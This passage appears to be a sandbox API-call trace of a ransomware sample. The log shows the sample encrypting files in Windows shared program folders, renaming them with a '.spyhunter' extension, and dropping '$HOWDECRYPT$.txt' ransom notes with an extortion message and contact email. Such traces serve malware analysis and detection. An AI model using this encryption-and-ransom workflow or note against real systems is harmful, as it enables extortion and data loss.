(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.893] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e460, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e460*=0x2ac, lpOverlapped=0x0) returned 1 [0178.893] CloseHandle (hObject=0xb0) returned 1 [0178.893] GetProcessHeap () returned 0x2c0000 [0178.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b6b8 | out: hHeap=0x2c0000) returned 1 [0178.893] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e400 | out: pbBuffer=0x270e400) returned 1 [0178.893] GetProcessHeap () returned 0x2c0000 [0178.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.893] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3f8*=0x30) returned 1 [0178.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.894] GetProcessHeap () returned 0x2c0000 [0178.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.894] GetProcessHeap () returned 0x2c0000 [0178.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b5c0 | out: hHeap=0x2c0000) returned 1 [0178.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.895] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.895] WriteFile (in: hFile=0xb0, lpBuffer=0x270e32f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e458, lpOverlapped=0x0 | out: lpBuffer=0x270e32f*, lpNumberOfBytesWritten=0x270e458*=0x127, lpOverlapped=0x0) returned 1 [0178.896] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.896] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e458, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e458*=0x2ac, lpOverlapped=0x0) returned 1 [0178.896] CloseHandle (hObject=0xb0) returned 1 [0178.896] GetProcessHeap () returned 0x2c0000 [0178.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8a28 | out: hHeap=0x2c0000) returned 1 [0178.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.897] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.897] WriteFile (in: hFile=0xb0, lpBuffer=0x270e32b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x270e32b*, lpNumberOfBytesWritten=0x270e454*=0x127, lpOverlapped=0x0) returned 1 [0178.898] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.898] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e454, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e454*=0x2ac, lpOverlapped=0x0) returned 1 [0178.898] CloseHandle (hObject=0xb0) returned 1 [0178.898] GetProcessHeap () returned 0x2c0000 [0178.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee34a0 | out: hHeap=0x2c0000) returned 1 [0178.898] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3f0 | out: pbBuffer=0x270e3f0) returned 1 [0178.898] GetProcessHeap () returned 0x2c0000 [0178.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3e8*=0x30) returned 1 [0178.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.899] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll") returned 97 [0178.899] StrStrW (lpFirst="extensibility.dll", lpSrch=".txt") returned 0x0 [0178.899] GetProcessHeap () returned 0x2c0000 [0178.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.899] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3ac*=0x1200, lpOverlapped=0x0) returned 1 [0178.938] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.938] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x270e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3ac*=0x1200, lpOverlapped=0x0) returned 1 [0178.938] GetProcessHeap () returned 0x2c0000 [0178.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.939] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.939] WriteFile (in: hFile=0xb0, lpBuffer=0x270e3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3ac, lpOverlapped=0x0 | out: lpBuffer=0x270e3ec*, lpNumberOfBytesWritten=0x270e3ac*=0x4, lpOverlapped=0x0) returned 1 [0178.939] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3ac*=0x30, lpOverlapped=0x0) returned 1 [0178.939] CloseHandle (hObject=0xb0) returned 1 [0178.939] GetProcessHeap () returned 0x2c0000 [0178.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.939] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.spyhunter") returned 107 [0178.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll.spyhunter")) returned 1 [0178.940] GetProcessHeap () returned 0x2c0000 [0178.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.940] GetProcessHeap () returned 0x2c0000 [0178.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.941] GetProcessHeap () returned 0x2c0000 [0178.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee35b8 | out: hHeap=0x2c0000) returned 1 [0178.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3f0 | out: pbBuffer=0x270e3f0) returned 1 [0178.941] GetProcessHeap () returned 0x2c0000 [0178.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3e8*=0x30) returned 1 [0178.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.963] GetProcessHeap () returned 0x2c0000 [0178.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.964] GetProcessHeap () returned 0x2c0000 [0178.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e805d0 | out: hHeap=0x2c0000) returned 1 [0178.964] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3e8 | out: pbBuffer=0x270e3e8) returned 1 [0178.964] GetProcessHeap () returned 0x2c0000 [0178.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.964] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3e0*=0x30) returned 1 [0178.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.977] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS") returned 75 [0178.977] StrStrW (lpFirst="HxRuntime.HxS", lpSrch=".txt") returned 0x0 [0178.977] GetProcessHeap () returned 0x2c0000 [0178.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.977] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.137] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.137] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.137] GetProcessHeap () returned 0x2c0000 [0179.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0179.138] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.138] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3a4, lpOverlapped=0x0 | out: lpBuffer=0x270e3e4*, lpNumberOfBytesWritten=0x270e3a4*=0x4, lpOverlapped=0x0) returned 1 [0179.301] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3a4*=0x30, lpOverlapped=0x0) returned 1 [0179.301] CloseHandle (hObject=0x9c) returned 1 [0179.301] GetProcessHeap () returned 0x2c0000 [0179.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.301] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS.spyhunter") returned 85 [0179.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HxRuntime.HxS.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hxruntime.hxs.spyhunter")) returned 1 [0179.303] GetProcessHeap () returned 0x2c0000 [0179.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.303] GetProcessHeap () returned 0x2c0000 [0179.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0179.303] GetProcessHeap () returned 0x2c0000 [0179.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66b20 | out: hHeap=0x2c0000) returned 1 [0179.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.306] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.306] WriteFile (in: hFile=0x9c, lpBuffer=0x270e31b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x270e31b*, lpNumberOfBytesWritten=0x270e444*=0x127, lpOverlapped=0x0) returned 1 [0179.306] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.307] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e444, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e444*=0x2ac, lpOverlapped=0x0) returned 1 [0179.307] CloseHandle (hObject=0x9c) returned 1 [0179.307] GetProcessHeap () returned 0x2c0000 [0179.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7f7c0 | out: hHeap=0x2c0000) returned 1 [0179.307] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e3e0 | out: pbBuffer=0x270e3e0) returned 1 [0179.307] GetProcessHeap () returned 0x2c0000 [0179.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0179.307] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e3d8*=0x30) returned 1 [0179.307] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.308] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll") returned 77 [0179.308] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.308] GetProcessHeap () returned 0x2c0000 [0179.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.309] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e39c*=0x2800, lpOverlapped=0x0) returned 1 [0179.311] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.311] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e39c*=0x2800, lpOverlapped=0x0) returned 1 [0179.311] GetProcessHeap () returned 0x2c0000 [0179.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.311] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.311] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e39c, lpOverlapped=0x0 | out: lpBuffer=0x270e3dc*, lpNumberOfBytesWritten=0x270e39c*=0x4, lpOverlapped=0x0) returned 1 [0179.312] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e39c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e39c*=0x30, lpOverlapped=0x0) returned 1 [0179.312] CloseHandle (hObject=0x9c) returned 1 [0179.312] GetProcessHeap () returned 0x2c0000 [0179.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.312] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.spyhunter") returned 87 [0179.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll.spyhunter")) returned 1 [0179.314] GetProcessHeap () returned 0x2c0000 [0179.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.314] GetProcessHeap () returned 0x2c0000 [0179.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0179.314] GetProcessHeap () returned 0x2c0000 [0179.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7f48 | out: hHeap=0x2c0000) returned 1 [0179.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0179.315] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.315] WriteFile (in: hFile=0x9c, lpBuffer=0x270e313*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e43c, lpOverlapped=0x0 | out: lpBuffer=0x270e313*, lpNumberOfBytesWritten=0x270e43c*=0x127, lpOverlapped=0x0) returned 1 [0179.316] lstrlenA 